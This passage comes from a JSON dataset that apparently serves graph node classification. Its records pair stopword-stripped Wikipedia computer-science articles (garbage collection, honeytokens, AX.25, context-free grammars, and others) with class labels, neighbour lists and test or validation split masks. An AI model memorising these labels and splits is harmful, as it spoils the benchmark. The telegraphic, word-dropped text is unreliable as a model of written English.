counter arc apple ecosystem ios os x 2011 incremental concurrent real-time garbage collectors developed baker algorithm lieberman algorithm baker algorithm allocation done either half single region memory becomes half full garbage collection performed moves live objects half remaining objects implicitly deallocated running program 'mutator check object references correct half move across background task finding objects generational garbage collection schemes based empirical observation objects die young generational garbage collection two allocation regions generations kept kept separate based object age new objects created young generation regularly collected generation full objects still referenced older regions copied next oldest generation occasionally full scan performed high-level language computer architectures include hardware support real-time garbage collection implementations real-time garbage collectors use tracing real-time garbage collectors meet hard real-time constraints used real-time operating system",
    "neighbors": [
      10752,
      10755,
      11269,
      2062,
      9231,
      9749,
      8728,
      4633,
      5658,
      541,
      3102,
      31,
      9245,
      7713,
      8226,
      10783,
      5165,
      5677,
      9780,
      11317,
      566,
      2105,
      9275,
      6717,
      6718,
      8767,
      2625,
      8771,
      7237,
      8262,
      6730,
      1613,
      6221,
      9299,
      6228,
      86,
      8280,
      3675,
      8289,
      6242,
      7267,
      2660,
      8293,
      2152,
      2666,
      1136,
      3698,
      9330,
      5751,
      9335,
      3705,
      634,
      7805,
      7816,
      4747,
      3212,
      3725,
      655,
      9877,
      8854,
      5783,
      10395,
      10403,
      5286,
      4777,
      5803,
      6828,
      2225,
      9393,
      1203,
      1715,
      7867,
      4799,
      5314,
      9925,
      712,
      1736,
      2250,
      7880,
      8908,
      205,
      5840,
      7889,
      6868,
      727,
      6871,
      7386,
      219,
      5853,
      1247,
      7392,
      7904,
      10463,
      739,
      11488,
      11490,
      10470,
      9960,
      7403,
      10478,
      5360,
      5361,
      5872,
      8435,
      4341,
      5365,
      6906,
      5892,
      3334,
      6919,
      2832,
      9490,
      11539,
      1301,
      6933,
      10012,
      3869,
      2335,
      3871,
      5921,
      3876,
      806,
      10024,
      9002,
      9004,
      814,
      6961,
      10547,
      11060,
      311,
      7992,
      6969,
      8000,
      4424,
      5961,
      10568,
      10569,
      8524,
      846,
      338,
      1363,
      3413,
      10581,
      10584,
      7513,
      348,
      8545,
      1378,
      10083,
      6502,
      9063,
      8554,
      363,
      3446,
      10104,
      8573,
      5503,
      2432,
      1409,
      1922,
      4992,
      6016,
      7039,
      3462,
      8071,
      8582,
      7562,
      8587,
      8079,
      5008,
      5521,
      11670,
      11674,
      1435,
      6556,
      6047,
      1952,
      1954,
      4516,
      5031,
      9128,
      428,
      435,
      6067,
      7091,
      8628,
      3512,
      10684,
      9152,
      5569,
      1474,
      6594,
      8644,
      4550,
      3529,
      5585,
      5074,
      11218,
      10198,
      2519,
      5080,
      7128,
      2010,
      3034,
      10712,
      477,
      7646,
      11227,
      482,
      7143,
      3561,
      3562,
      3051,
      4589,
      10739,
      6132,
      3573,
      7158,
      11255,
      3577,
      2556,
      2045,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 2305,
    "label": 4,
    "text": "Honeytoken:honeytoken field computer security honeytokens honeypots computer systems value lies use abuse generalization ideas honeypot canary values often used stack protection schemes honeytokens necessarily prevent tampering data instead give administrator measure confidence data integrity honeytokens fictitious words records added legitimate databases allow administrators track data situations would n't normally able track cloud based networks data stolen honey tokens allow administrators identify stolen leaked three locations medical records different honey tokens form fake medical records could added location different honeytoken would set records chosen unique unlikely ever appear legitimate traffic also detected network intrusion-detection system ids alerting system administrator things would otherwise go unnoticed one case go beyond merely ensuring integrity reactive security mechanisms may actually prevent malicious activity e.g dropping packets containing honeytoken router however mechanisms pitfalls might cause serious problems honeytoken poorly chosen appeared otherwise legitimate network traffic dropped term first coined augusto paes de barros 2003 honeytokens exist many forms dead fake account database entry would selected malicious queries making concept ideally suited ensuring data integrity particular example honeytoken fake email address used track mailing list stolen",
    "neighbors": [
      1544,
      9256,
      5245,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2306,
    "label": 5,
    "text": "AX.25:ax.25 ax.25 amateur x.25 data link layer protocol originally derived layer 2 x.25 protocol suite designed use amateur radio operators used extensively amateur packet radio networks ax.25 v2.0 later occupies data link layer second layer osi model responsible establishing link-layer connections transferring data encapsulated frames nodes detecting errors introduced communications channel ax.25 pre-osi-model protocol original specification written cleanly separate osi layers rectified version 2.0 1984 assumes compliance osi level 2 ax.25 commonly used data link layer network layer ipv4 tcp used top ax.25 supports limited form source routing although possible build ax.25 switches similar way ethernet switches work yet accomplished ax.25 define physical layer implementation practice 1200 baud bell 202 tones 9600 baud g3ruh dfsk almost exclusively used vhf uhf hf standard transmission mode 300 baud bell 103 tones although little use ax.25 hf exists today physical layer ax.25 defines physical layer state machine timers related transmitter receiver switching delays link layer ax.25 uses hdlc frame syntax procedures iso 3309 frames transmitted nrzi encoding hdlc specifies syntax semantics variable-length address field frame ax.25 specifies field subdivided multiple addresses source address zero repeater addresses destination address embedded control fields use repeaters simplify compliance amateur radio rules addresses derive station call signs source destination repeater stations media access control follows carrier sense multiple access approach collision recovery csma/cr ax.25 supports virtual-circuit connected datagram-style connectionless modes operation latter used great effect automatic packet reporting system aprs simple source routing mechanism using digipeaters available datalink level digipeaters act simplex repeaters receiving decoding retransmitting packets local stations allow multi-hop connections established two stations unable communicate directly digipeaters use modify information frame address field perform function ax.25 specification defines complete albeit point point network layer protocol seen little use outside keyboard-to-keyboard keyboard-to-bbs connections net/rom rose texnet exist provide routing nodes principle variety layer 3 protocols used ax.25 including ubiquitous internet protocol approach used amprnet amateur radio tcp/ip network using ax.25 ui-frames datalink layer traditionally amateur radio operators connected ax.25 networks use terminal node controller contains microprocessor implementation protocol firmware devices allow network resources accessed using dumb terminal transceiver ax.25 also implemented personal computers example linux kernel includes native support ax.25 computer connects tranceiver via audio interface via simple modem computers also interconnect computers bridged routed tncs tranceivers located elsewhere using bpq ethernet framing also natively supported linux kernel facilitate modern setups actual tranceivers directly placed antenna mast creating 'low loss shorter rf wiring need replacing expensive long thick coax cables amplifiers cheap fiber rfi ways /emp/lightning resistant copper ethernet wiring bpq ethernet framing allows connect entire stacks tnc+tranceiver pairs existing network computers access radio links offered simulaniously transparently bridged communicate internally ax.25 filtered routing select specific tncs/radio frequencies note linux kernel ax.25 implementation contain bugs mainly disconnecting sessions bug appears slipped time due maintenance people using exclusively aprs virtual channel connected mode example tap interfaces supporting full 7 bytes call sign string length interface drivers expect 6 byte hw address mac up-to-7 byte one like ax.25 use requires ax.25 often used tnc implements kiss framing low-cost alternative using expensive uncommon hdlc controller cards kiss framing part ax.25 protocol sent air merely serves encapsulate protocol frames way successfully pass serial link tnc kiss framing derived slip makes many assumptions two endpoints involved conversation slip two slip-connected hosts kiss assumed kiss framing link serial host computer pc involved among things makes awkward address multiple tncs without multiple serial data channels alternatives kiss exist address limitations 6pack ax.25 frequently used establish direct point-to-point links packet radio stations without additional network layers sufficient keyboard-to-keyboard contacts stations accessing local bulletin board systems dx clusters recent years aprs become popular application tunneling ax.25 packets ip axip axudp used encapsulate ax.25 ip udp packets speeds commonly used transmit packet radio data rarely higher 9,600 bit/s typically 1,200 bit/s use additional network layers ax.25 impractical due data overhead involved limitation ax.25 per se places constraints sophistication applications designed use hdlc protocols identify frame address ax.25 implementation hdlc includes sender destination station call-sign plus ssid value range 0 15 frame address itu warc2003 radio amateur station callsign specification amended earlier maximum length six characters raised seven characters however ax.25 built-in hard limit six characters means seven-character callsign used ax.25 network ax.25 lacks explicit port sap ssid often assumes role thus one service per ax.25 station ssid address often kludged around varying degrees success amateurs notably phil karn ka9q argued ax.25 well-suited operation noisy limited-bandwidth radio links citing lack forward error correction fec automatic data compression however viable widely adopted successor ax.25 yet emerge likely reasons may include despite limitations extension ax.25 protocol supporting forward error correction created tapr extension called fx.25 small gadget transmitters need know transmitted need monitor channel occupation radio receiver rssi received signal strength indication know send transmitting interleaved reed-solomon fec signal smart modulation needs lot fewer resources reception signal thus sufficient microprocessor might cost usd 5 instead usd 30 system cost might stay us 50 transmitter included however recent years ability receive well send using cheap microcontrollers atmel avr motorola 68hc08 families demonstrated seems however new system compatible current bell 202 modulation unlikely widely adopted current modulation seems fulfill sufficient need little motivation exists move superior design especially new design requires significant hardware purchases",
    "neighbors": [
      10112,
      388,
      8708,
      3847,
      6152,
      9868,
      2701,
      11413,
      2968,
      11288,
      2458,
      5020,
      1192,
      11560,
      682,
      3115,
      7723,
      11181,
      7865,
      4543,
      7490,
      9284,
      5321,
      7498,
      2911,
      2912,
      2785,
      5472,
      5092,
      5863,
      2920,
      4335,
      2802
    ],
    "mask": "Test"
  },
  {
    "node_id": 2307,
    "label": 9,
    "text": "ECLR-attributed_grammar:eclr-attributed grammar eclr-attributed grammars special type attribute grammars variant lr-attributed grammars equivalence relation inherited attributes used optimize attribute evaluation ec stands equivalence class rie based eclr-attributed grammars superset lr-attributed grammars",
    "neighbors": [
      2256,
      7634
    ],
    "mask": "Test"
  },
  {
    "node_id": 2308,
    "label": 2,
    "text": "HP_Veer:hp veer veer smartphone announced hp february 9 2011 device uses hp webos powered qualcomm snapdragon processor 2.6-inch screen smartphone notable credit card-sized dimensions depth comparable size deck cards device seen successor palm line-up pixi earlier centro models hp veer announced february 9 2011 along hp pre 3 hp touchpad veer released us may 15 2011 network marketed hp veer 4g device slated support touch-to-share proximity-based sharing feature later update official update supporting touch-to-share released although several users purchased devices ebay fully implemented touch-to-share sms sharing support following hp announcement august 18 would cease development webos hardware veer discontinued similar touchpad price lowered significantly firesale hp veer powered qualcomm snapdragon msm7230 system-on-a-chip made qualcomm based 45 nanometer cmos process veer snapdragon composed principally scorpion cpu running 800mhz adreno 205 gpu digital signal processor cellular transmission/reception/processing gsm umts gpsone gps module audio subsystem scorpion core implements armv7 architecture similar arm cortex-a8 supports arm neon instruction set extensions vfpv3 floating-point extensions referred “ venum ” media processing engine scorpion accelerate example image processing camera main purpose venum engine boost performance scorpion cpu multimedia processing resulting power saving task completed faster less power consumed processor venum media processing engine one without adreno 205 gpu supports opengl es 2.0 opengl es 1.1 openvg 1.1 egl 1.3 direct3d mobile svgt 1.2 directdraw hp veer 66 mm 2.6 inch capacitive touchscreen resolution 320 x 400 pixel touchscreen designed bare finger multiple fingers multi-touch sensing accelerometer allows orientation screen change portrait landscape mode proximity sensor deactivates display touchscreen device brought near face call slide-out 4-row qwerty keyboard microphone located slide-out keyboard left side device volume button upper right side power button top side ringer switch vibration mode usb 3.5 mm connectivities provided proprietary magnetic connector battery rated 910 mah non-removable hp states provides 5.0 hours talk time 300 hours standby time 8 gb board 6.5 gb available user microsd card socket veer shipped either webos 2.1.1 2.1.2 depending region seen official update since following pre-installed applications",
    "neighbors": [
      1537,
      3585,
      10500,
      6790,
      9863,
      5384,
      3340,
      1682,
      2962,
      405,
      3606,
      8982,
      10393,
      5019,
      6178,
      5164,
      7983,
      9266,
      9013,
      694,
      11062,
      1849,
      9913,
      1728,
      7492,
      10820,
      5318,
      11337,
      5963,
      9163,
      9037,
      2258,
      2259,
      1621,
      6618,
      5339,
      2784,
      4449,
      4832,
      3300,
      487,
      9964,
      2285,
      9581,
      10606,
      1776,
      11247,
      2420,
      8952,
      10109,
      9598
    ],
    "mask": "None"
  },
  {
    "node_id": 2309,
    "label": 4,
    "text": "RootkitRevealer:rootkitrevealer rootkitrevealer proprietary freeware tool rootkit detection microsoft windows bryce cogswell mark russinovich runs windows xp windows server 2003 32-bit-versions output lists windows registry file system api discrepancies may indicate presence rootkit tool triggered sony bmg copy protection rootkit scandal rootkitrevealer longer developed",
    "neighbors": [
      5380,
      1417,
      2443,
      6797,
      9488,
      537,
      3482,
      5799,
      5673,
      7983,
      7473,
      9791,
      5057,
      10828,
      10448,
      5082,
      9695,
      3935,
      4074,
      11248
    ],
    "mask": "Test"
  },
  {
    "node_id": 2310,
    "label": 2,
    "text": "Rpmdrake:rpmdrake rpmdrake graphical interface urpmi permits installation software packages provided part mandriva linux mageia rosa package installation application written gtk2-perl allows rpmdrake free software available gnu general public license version 2. urpmi developed guillaume cottenceau rafael garcia-suarez thierry vignaud first mandriva mageia see",
    "neighbors": [
      11525,
      10760,
      2955,
      7435,
      7181,
      7947,
      2448,
      1813,
      6680,
      8476,
      5670,
      4775,
      7847,
      6828,
      6446,
      1455,
      7983,
      1842,
      823,
      2872,
      6583,
      3131,
      10172,
      3649,
      10817,
      9671,
      5067,
      6227,
      4309,
      4951,
      2010,
      9564,
      7140,
      5096,
      4841,
      9324,
      7920,
      2417,
      1138,
      1522,
      6257,
      10096,
      6393
    ],
    "mask": "Test"
  },
  {
    "node_id": 2311,
    "label": 1,
    "text": "Watercraft:watercraft watercraft also known marine vessels waterborne vessels vehicles used water including ships boats hovercraft submarines watercraft usually propulsive capability whether sail oar paddle engine hence distinct simple device merely floats log raft watercraft would described either ship boat however numerous craft many people would consider neither ship boat surfboards used paddle board underwater robots seaplanes torpedoes although ships typically larger boats distinction two categories one size per se term watercraft unlike terms aircraft spacecraft rarely used describe individual object rather term serves unify category ranges jet skis aircraft carriers vessel may used saltwater freshwater pleasure recreation physical exercise commerce transport military missions usually purposes behind watercraft designs skills seafaring education leisure activities fishing resource extraction transportation cargo passengers conducting combat salvage operations general purpose water vehicle identifies utility maritime industry sub-sector design water vehicle created usually seeks achieve balance internal capacity tonnage speed seaworthiness tonnage predominantly consideration transport operations speed important warships safety primary consideration less experienced often smaller less stable training leisure vehicles due great level regulatory compliance required larger watercraft ensures infrequent instances foundering sea application extensive computer modeling ship model basin testing shipyard construction begins historically water vehicles propelled people poles paddles oars manipulation sails propel wind pressure and/or lift variety engineered machinery create subsurface thrust process internal combustion electricity technological history watercraft european history divided reference marine propulsion simple paddle craft oared galleys 8th century bce 15th century lateen sail age discovery early 15th century early 17th century full rigged ships age sail 16th mid 19th century age steam reciprocating marine steam engine roughly 1770 1914 steam turbine later gas turbine internal combustion engines using diesel fuel petrol lng fuels turn 20th century supplemented degree nuclear marine propulsion since 1950s naval watercraft current technological development seeks identify cheaper renewable less polluting sources propulsion watercraft shapes sizes secondary applications technology watercraft used structural materials navigation aids case warships weapon systems purpose usage physical environment define materials used construction historically included grasses leather timbers metals combined timber without silicate plastic derivatives others watercraft registration registration watercraft government authority united states consists alphanumeric string called vessel registration number issued state department motor vehicles navigation aids varied time astronomical observation mechanical mechanisms recently analogue digital computer devices rely gps systems naval weapon systems closely followed development land weapons developing development steam propulsion coupled rapid-firing breech-loading guns naval combat often concluded boarding combat opposing crews since early 20th century substantial development technologies allow force projection naval task force land objective using marine infantry",
    "neighbors": [
      41,
      676
    ],
    "mask": "Test"
  },
  {
    "node_id": 2312,
    "label": 4,
    "text": "Security_log:security log security log used track security-related information computer system examples include according stefan axelsson unix installations run form security logging software mainly security logging facilities expensive terms disk storage processing time cost associated analyzing audit trail either manually special software",
    "neighbors": [
      4640,
      6273,
      3532,
      10604,
      8080,
      2801
    ],
    "mask": "None"
  },
  {
    "node_id": 2313,
    "label": 2,
    "text": "Strsafe.h:strsafe.h strsafe.h non-standard c header file provided windows sdk starting windows xp service pack 2 provides safer buffer handling provided standard c string functions widely known security issues involving buffer overruns used correctly functions included strsafe.h replace standard c string handling i/o functions including codice_1 codice_2 codice_3 codice_4 strsafe functions require length string either characters bytes parameter operation would exceed length destination buffer operation fails string still terminated null final valid index using library functions result undefined behavior independent security researchers noted security issues still possible functions strsafe.h passed correct buffer length use library recommended united states department homeland security",
    "neighbors": [
      3708
    ],
    "mask": "Test"
  },
  {
    "node_id": 2314,
    "label": 6,
    "text": "Clustered_file_system:clustered file system clustered file system file system shared simultaneously mounted multiple servers several approaches clustering employ clustered file system direct attached storage node clustered file systems provide features like location-independent addressing redundancy improve reliability reduce complexity parts cluster parallel file systems type clustered file system spread data across multiple storage nodes usually redundancy performance shared-disk file system uses storage area network san allow multiple computers gain direct disk access block level access control translation file-level operations applications use block-level operations used san must take place client node common type clustered file system shared-disk file system —by adding mechanisms concurrency control—provides consistent serializable view file system avoiding corruption unintended data loss even multiple clients try access files time shared-disk file-systems commonly employ sort fencing mechanism prevent data corruption case node failures unfenced device cause data corruption loses communication sister nodes tries access information nodes accessing underlying storage area network may use number block-level protocols including scsi iscsi hyperscsi ata ethernet aoe fibre channel network block device infiniband different architectural approaches shared-disk filesystem distribute file information across servers cluster fully distributed others utilize centralized metadata server achieve result enabling servers access data shared storage device distributed file systems share block level access storage use network protocol commonly known network file systems even though file systems use network send data distributed file systems restrict access file system depending access lists capabilities servers clients depending protocol designed difference distributed file system distributed data store distributed file system allows files accessed using interfaces semantics local files example mounting/unmounting listing directories read/write byte boundaries system native permission model distributed data stores contrast require using different api library different semantics often database distributed file system may also created software implementing ibm distributed data management architecture ddm programs running one computer use local interfaces semantics create manage access files located networked computers client requests trapped converted equivalent messages defined ddm using protocols also defined ddm messages transmitted specified remote computer ddm server program interprets messages uses file system interfaces computer locate interact specified file distributed file systems may aim transparency number aspects aim invisible client programs see system similar local file system behind scenes distributed file system handles locating files transporting data potentially providing features listed incompatible timesharing system used virtual devices transparent inter-machine file system access 1960s file servers developed 1970s 1976 digital equipment corporation created file access listener fal implementation data access protocol part decnet phase ii became first widely used network file system 1985 sun microsystems created file system called network file system nfs became first widely used internet protocol based network file system notable network file systems andrew file system afs apple filing protocol afp netware core protocol ncp server message block smb also known common internet file system cifs 1986 ibm announced client server support distributed data management architecture ddm system/36 system/38 ibm mainframe computers running cics followed support ibm personal computer as/400 ibm mainframe computers mvs vse operating systems flexos ddm also became foundation distributed relational database architecture also known drda many peer-to-peer network protocols open-source distributed file systems cloud closed-source clustered file systems e. g. 9p afs coda cifs/smb dce/dfs lustre panfs google file system mnet chord project network-attached storage nas provides storage file system like shared disk file system top storage area network san nas typically uses file-based protocols opposed block-based protocols san would use nfs popular unix systems smb/cifs server message block/common internet file system used ms windows systems afp used apple macintosh computers ncp used oes novell netware failure disk hardware given storage node cluster create single point failure result data loss unavailability fault tolerance high availability provided data replication one sort another data remains intact available despite failure single piece equipment examples see lists distributed fault-tolerant file systems distributed parallel fault-tolerant file systems common performance measurement clustered file system amount time needed satisfy service requests conventional systems time consists disk-access time small amount cpu-processing time clustered file system remote access additional overhead due distributed structure includes time deliver request server time deliver response client direction cpu overhead running communication protocol software concurrency control becomes issue one person client accessing file block want update hence updates file one client interfere access updates clients problem complex file systems due concurrent overlapping writes different writers write overlapping regions file concurrently problem usually handled concurrency control locking may either built file system provided add-on protocol ibm mainframes 1970s could share physical disks file systems machine channel connection drives control units 1980s digital equipment corporation tops-20 openvms clusters vax/alpha/ia64 included shared disk file systems",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      1049,
      3611,
      9249,
      9762,
      5158,
      3628,
      7225,
      7739,
      11323,
      9277,
      8772,
      9285,
      1109,
      5206,
      4708,
      5220,
      8810,
      9836,
      7789,
      9333,
      11382,
      6263,
      9335,
      1147,
      9343,
      7818,
      654,
      2193,
      2194,
      6291,
      2197,
      2199,
      11419,
      2723,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      7863,
      5816,
      10422,
      1212,
      8380,
      3265,
      10951,
      6856,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      2775,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      1776,
      3312,
      3826,
      2291,
      246,
      3834,
      3323,
      3326,
      3328,
      11012,
      2314,
      8461,
      6416,
      273,
      1810,
      7446,
      6935,
      11033,
      283,
      287,
      1825,
      6434,
      5413,
      4390,
      3368,
      4907,
      9004,
      302,
      11568,
      6961,
      6963,
      1844,
      3898,
      6970,
      11072,
      10051,
      3909,
      2378,
      11596,
      4431,
      5969,
      346,
      2395,
      3931,
      2397,
      7005,
      5472,
      10596,
      2407,
      10087,
      4982,
      6519,
      376,
      11128,
      890,
      11638,
      7554,
      8075,
      7053,
      7565,
      6545,
      5013,
      11673,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      1450,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      6591,
      8640,
      8129,
      9665,
      8643,
      9677,
      7126,
      2015,
      1509,
      9189,
      1517,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 2315,
    "label": 4,
    "text": "Keycloak:keycloak keycloak open source software product allow single sign-on identity management access management aimed modern applications services jboss community project stewardship red hat use upstream project rh-sso product conceptual perspective tool intent make easy secure applications services little coding first production release keycloak september 2014 development started year earlier 2016 red hat switched rh sso product based picketlink framework based keycloak upstream project followed merging picketlink codebase keycloak extent keycloak also considered replacement red hat jboss sso open source product previously superseded picketlink jboss.org redirecting old jbosssso subsite keycloak website jboss name registered trade mark red hat moved upstream open source projects names avoid using jboss jboss wildfly commonly recognized example among many features keycloak include 2 main components keycloak",
    "neighbors": [
      3521,
      11244,
      5677,
      9455,
      6098,
      6651
    ],
    "mask": "Test"
  },
  {
    "node_id": 2316,
    "label": 9,
    "text": "Context-free_grammar:context-free grammar formal language theory context-free grammar cfg certain type formal grammar set production rules describe possible strings given formal language production rules simple replacements example rule formula_1 replaces formula_2 formula_3 multiple replacement rules given value example formula_1 formula_5 means formula_2 replaced either formula_3 formula_8 context-free grammars rules one-to-one one-to-many one-to-none rules applied regardless context left-hand side production rule always nonterminal symbol means symbol appear resulting formal language case language contains letters formula_3 formula_8 formula_11 rules also applied reverse check whether string grammatically correct according grammar example context-free grammar describes two-letter strings containing letters formula_3 formula_8 formula_14 formula_1 formula_5 start nonterminal symbol formula_17 use rule formula_14 turn formula_17 formula_20 apply one two later rules example apply formula_5 first formula_2 get formula_23 apply formula_1 second formula_2 get formula_26 since formula_3 formula_8 terminal symbols context-free grammars terminal symbols never appear left hand side production rule rules applied process used applying last two rules different orders order get possible strings within simple context-free grammar languages generated context-free grammars known context-free languages cfl different context-free grammars generate context-free language important distinguish properties language intrinsic properties properties particular grammar extrinsic properties language equality question two given context-free grammars generate language undecidable context-free grammars arise linguistics used describe structure sentences words natural language fact invented linguist noam chomsky purpose really lived original expectation contrast computer science use recursively-defined concepts increased used early application grammars used describe structure programming languages newer application used essential part extensible markup language xml called document type definition linguistics authors use term phrase structure grammar refer context-free grammars whereby phrase-structure grammars distinct dependency grammars computer science popular notation context-free grammars backus–naur form bnf since time pāṇini least linguists described grammars languages terms block structure described sentences recursively built smaller phrases eventually individual words word elements essential property block structures logical units never overlap example sentence logically parenthesized logical metasymbols follows context-free grammar provides simple mathematically precise mechanism describing methods phrases natural language built smaller blocks capturing block structure sentences natural way simplicity makes formalism amenable rigorous mathematical study important features natural language syntax agreement reference part context-free grammar basic recursive structure sentences way clauses nest inside clauses way lists adjectives adverbs swallowed nouns verbs described exactly context-free grammars special form semi-thue systems general form date back work axel thue formalism context-free grammars developed mid-1950s noam chomsky also classification special type formal grammar called phrase-structure grammars chomsky called phrase structure grammar also known constituency grammar whereby constituency grammars stand contrast dependency grammars chomsky generative grammar framework syntax natural language described context-free rules combined transformation rules block structure introduced computer programming languages algol project 1957–1960 consequence also featured context-free grammar describe resulting algol syntax became standard feature computer languages notation grammars used concrete descriptions computer languages came known backus–naur form two members algol language design committee block structure aspect context-free grammars capture fundamental grammar terms syntax grammar often identified context-free grammar rules especially computer science formal constraints captured grammar considered part semantics language context-free grammars simple enough allow construction efficient parsing algorithms given string determine whether generated grammar earley parser example algorithm widely used lr parsers simpler algorithms deal restrictive subsets context-free grammars context-free grammar defined 4-tuple formula_29 production rule formalized mathematically pair formula_32 formula_33 nonterminal formula_34 string variables and/or terminals rather using ordered pair notation production rules usually written using arrow operator left hand side right hand side formula_35 allowed empty string case customary denote ε form formula_36 called -production common list right-hand sides left-hand side line using pipe symbol separate rules formula_37 formula_38 hence written formula_39 case formula_40 formula_41 called first second alternative respectively strings formula_42 say directly yields written formula_43 formula_44 formula_33 formula_46 formula_47 formula_48 thus result applying rule formula_49 strings formula_50 say yields written formula_51 formula_52 textbooks formula_53 formula_54 case formula_55 i.e. formula_56 relation formula_57 holds words formula_58 formula_59 reflexive transitive closure allowing word yield transitive closure requiring least one step formula_60 respectively language grammar formula_29 set language said context-free language cfl exists cfg formula_63 non-deterministic pushdown automata recognize exactly context-free languages context-free grammar said proper every context-free grammar effectively transformed weakly equivalent one without unreachable symbols weakly equivalent one without unproductive symbols weakly equivalent one without cycles every context-free grammar producing ε effectively transformed weakly equivalent one without ε-productions altogether every grammar effectively transformed weakly equivalent proper cfg grammar formula_68 productions context-free proper since includes ε-production typical derivation grammar makes clear formula_69 language context-free however proved regular productions added context-free grammar set palindromes alphabet obtained canonical example context-free grammar parenthesis matching representative general case two terminal symbols one nonterminal symbol s. production rules first rule allows symbol multiply second rule allows symbol become enclosed matching parentheses third rule terminates recursion second canonical example two different kinds matching nested parentheses described productions terminal symbols nonterminal s. following sequence derived grammar context-free grammar pair characters way brackets simplest example grammar generates language formula_70 regular according pumping lemma regular languages special character ε stands empty string changing grammar obtain grammar generating language formula_71 instead differs contains empty string original grammar context-free grammar language consisting strings b containing unequal number b nonterminal generate strings number b nonterminal u generates strings b nonterminal v generates strings fewer b omitting third alternative rule u v n't restrict grammar language another example non-regular language formula_72 context-free generated following context-free grammar formation rules terms formulas formal logic fit definition context-free grammar except set symbols may infinite may one start symbol contrast well-formed nested parentheses square brackets previous section context-free grammar generating sequences two different types parentheses separately balanced disregarding two types need nest inside one another example fact language context free proven using pumping lemma context-free languages proof contradiction observing words form formula_73 belong language language belongs instead general class described conjunctive grammar turn also includes non-context-free languages language words form formula_74 every regular grammar context-free context-free grammars regular following context-free grammar however also regular terminals b nonterminal s. language described nonempty strings formula_75s formula_76s end formula_75 grammar regular rule one nonterminal right-hand side nonterminals end right-hand side every regular grammar corresponds directly nondeterministic finite automaton know regular language using pipe symbols grammar described tersely follows derivation string grammar sequence grammar rule applications transform start symbol string derivation proves string belongs grammar language derivation fully determined giving step clarity intermediate string usually given well instance grammar string derived derivation often strategy followed deterministically determines next nonterminal rewrite given strategy derivation completely determined sequence rules applied instance leftmost derivation summarized distinction leftmost derivation rightmost derivation important parsers transformation input defined giving piece code every grammar rule executed whenever rule applied therefore important know whether parser determines leftmost rightmost derivation determines order pieces code executed see example parsers lr parsers derivation also imposes sense hierarchical structure string derived example string 1 1 derived according leftmost derivation structure string would ... indicates substring recognized belonging s. hierarchy also seen tree tree called parse tree concrete syntax tree string contrast abstract syntax tree case presented leftmost rightmost derivations define parse tree however another rightmost derivation string defines following parse tree note however parse trees obtained leftmost rightmost derivations example last tree obtained leftmost derivation follows string language grammar one parsing tree grammar said ambiguous grammar grammars usually hard parse parser always decide grammar rule apply usually ambiguity feature grammar language unambiguous grammar found generates context-free language however certain languages generated ambiguous grammars languages called inherently ambiguous languages context-free grammar syntactically correct infix algebraic expressions variables x z grammar example generate string follows note many choices made underway rewrite going performed next choices look quite arbitrary matter fact sense string finally generated always example second third rewrites could done opposite order also many choices made rule apply selected codice_1 changing choices made order made usually affects terminal string comes end let look detail consider parse tree derivation starting top step step tree expanded unexpanded codice_1es nonterminals remain picking different order expansion produce different derivation parse tree parse tree change pick different rule apply position tree different parse tree still produce terminal string codice_3 case yes particular grammar possible grammars property called ambiguous example codice_4 produced two different parse trees however language described grammar inherently ambiguous alternative unambiguous grammar given language example picking codice_1 start symbol alternative grammar produce codice_4 parse tree similar left one i.e implicitly assuming association codice_7 according standard operator precedence elaborate unambiguous context-free grammars constructed produce parse trees obey desired operator precedence associativity rules every context-free grammar generate empty string transformed one ε-production rule empty string product grammar generate empty string necessary include rule formula_78 need ε-rule every context-free grammar ε-production equivalent grammar chomsky normal form grammar greibach normal form equivalent means two grammars generate language especially simple form production rules chomsky normal form grammars theoretical practical implications instance given context-free grammar one use chomsky normal form construct polynomial-time algorithm decides whether given string language represented grammar cyk algorithm context-free languages closed various operations languages k l context-free result following operations closed general intersection hence neither complementation set difference following decidable problems context-free grammars parsing problem checking whether given word belongs language given context-free grammar decidable using one general-purpose parsing algorithms context-free parsing chomsky normal form grammars shown leslie g. valiant reducible boolean matrix multiplication thus inheriting complexity upper bound n conversely lillian lee shown n boolean matrix multiplication reducible n cfg parsing thus establishing kind lower bound latter decidable whether given non-terminal context-free grammar reachable whether productive whether nullable derive empty string decidable whether given grammar regular grammar well whether k grammar given k ≥0 k given latter problem undecidable given context-free language neither decidable whether regular whether k language given k algorithms decide whether language given context-free language empty well whether finite questions undecidable wider classes grammars become decidable context-free grammars e.g emptiness problem whether grammar generates terminal strings undecidable context-sensitive grammars decidable context-free grammars however many problems undecidable even context-free grammars examples given cfg generate language strings alphabet terminal symbols used rules reduction demonstrated problem well-known undecidable problem determining whether turing machine accepts particular input halting problem reduction uses concept computation history string describing entire computation turing machine cfg constructed generates strings accepting computation histories particular turing machine particular input thus accept strings machine n't accept input given two cfgs generate language undecidability problem direct consequence previous impossible even decide whether cfg equivalent trivial cfg defining language strings given two cfgs first one generate strings second one generate problem decidable language equality could decided two cfgs g1 g2 generate language l g1 subset l g2 l g2 subset l g1 using greibach theorem shown two following problems undecidable given cfg ambiguous undecidability problem follows fact algorithm determine ambiguity existed post correspondence problem could decided known undecidable given two cfgs string derivable grammars problem decidable undecidable post correspondence problem could decided given strings formula_79 alphabet formula_80 let grammar consist rule formula_82 denotes reversed string formula_83 formula_76 n't occur among formula_85 let grammar consist rule post problem given formula_79 solution share derivable string obvious way extend context-free grammar formalism allow nonterminals arguments values passed along within rules allows natural language features agreement reference programming language analogs correct use definition identifiers expressed natural way e.g easily express english sentences subject verb must agree number computer science examples approach include affix grammars attribute grammars indexed grammars van wijngaarden two-level grammars similar extensions exist linguistics extended context-free grammar regular right part grammar one right-hand side production rules allowed regular expression grammar terminals nonterminals extended context-free grammars describe exactly context-free languages another extension allow additional terminal symbols appear left-hand side rules constraining application produces formalism context-sensitive grammars number important subclasses context-free grammars lr parsing extends parsing support larger range grammars turn generalized lr parsing extends lr parsing support arbitrary context-free grammars grammars lr grammars essentially performs parsing lr parsing respectively 